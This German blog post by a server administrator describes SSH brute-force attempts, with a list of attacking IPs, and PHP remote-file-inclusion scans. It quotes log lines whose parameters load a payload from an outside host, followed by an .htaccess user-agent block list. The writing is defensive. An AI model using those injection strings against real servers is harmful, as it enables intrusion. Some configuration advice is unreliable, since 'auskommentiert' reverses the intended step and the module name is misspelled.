Schlagwort-Archive: Hacking

SSH-Hacking per Script

Kaum macht man mal an seinem Router den Port 22 für SSH von Außen auf, damit man auch mal schnell etwas von Unterwegs konfigurieren kann, da tummeln sich die Script-Kids und versuchen auch mal ihr Glück.

Zu meinem Glück hat es bisher mit dem Login der Kids nicht wirklich geklappt und meine Liste der geblockten TCP/IP-Adressen ist wieder um einiges länger geworden. Von folgenden IPs wurde in den letzten paar Tagen Angriffe unternommen:

203.197.128.204 211.253.236.157 83.170.115.112 211.151.46.252

63.131.149.198 209.160.40.161 222.218.156.41 200.118.110.91
82.204.181.164 202.115.22.252 150.188.110.80 61.129.89.225
218.94.9.90 80.191.68.190 82.63.162.187 61.184.136.12
193.95.206.99 198.64.136.92 200.78.212.68 67.152.82.140
202.106.53.50 59.106.22.221 202.106.62.21 216.185.43.60
221.12.138.78 210.0.210.182 221.224.90.37 210.154.16.12
211.157.98.25 218.249.201.2 218.69.96.250 222.143.24.75
87.255.65.12 210.22.124.2 218.108.0.68 86.62.97.165
211.166.9.80 85.25.151.96 43.253.35.15 81.91.236.79

Wenn ich mir im LOG die Liste der User Namen ansehe die durch probiert worden sind, wird mir wieder klar wie wichtig es ist unbenutzte Benutzer im eigenen System zu löschen und allen anderen ein sicheres Passwort zu geben. Das sichere Passwort hat mindestens 8 Zeichen und enthält Zahlen und Sonderzeichen.

PHP Hacking durch Scripts

Gestern habe ich mal wieder die Statistiken meines Webservers aufgerufen und durchgesehen was dort so aufgerufen wird. Aufgefallen war mir ein Eintrag “Morfeus Fucking Scanner” sowie “libwww-perl/x.yy” als User Agent.
Nachfolgend einige Zeilen aus dem LOG:

66.160.141.42 – – [16/Sep/2008:01:17:31 +0200] “GET /parse/parser.php?WN_BASEDIR=http://144.131.145.199/1.gif?/ HTTP/1.1” 404 1049 “-” “Morfeus Fucking Scanner”
66.160.141.42 – – [16/Sep/2008:01:17:32 +0200] “GET /?installed_config_file=http://144.131.145.199/1.gif?/ HTTP/1.1” 200 3395 “-” “Morfeus Fucking Scanner”
66.160.141.42 – – [16/Sep/2008:01:17:32 +0200] “GET /pjsfiles/modify.php?installed_config_file=http://144.131.145.199/1.gif?/ HTTP/1.1” 404 1049 “-” “Morfeus Fucking Scanner”
66.160.141.42 – – [16/Sep/2008:01:17:33 +0200] “GET //vwar/backup/errors.php?error=http://144.131.145.199/1.gif?/ HTTP/1.1” 404 1049 “-” “Morfeus Fucking Scanner”

So wie es aussieht handelt es sich dabei um ein Script, welches diverse PHP Seiten von verschiedenen Anwendungen aufrufen will um dort eine Schwachstelle im PHP auszunutzen.

Auf der Suche nach einer Möglichkeit diese Scripte vom eigenen Webserver zu verbannen tauchen im Netz immer wieder die nachfolgenden Einträge in der .htaccess auf:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Morfeus
RewriteRule ^.*$ – [F]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$ – [F]

Eigentlich funktioniert diese Methode ganz gut, sie hat jedoch den Nachteil das sie nur in dem Verzeichnis funktioniert, indem die Datei .htaccess liegt. Somit muss in jedem Verzeichnis auf dem Webserver eine .htaccess erstellt werden und um die oben angegebenen Einträge erweitert werden. Einfacher ist hierfür die Methode eine globale Konfiguration in der httpd.conf einzutragen. Die genannten Einträge lassen sich auch global in der httpd.conf definieren und sind dann für alle Verzeichnisse gültig. Damit sie funktionieren muss nur noch der Eintrag “LoadModule rewrite_modue” auskommentiert werden.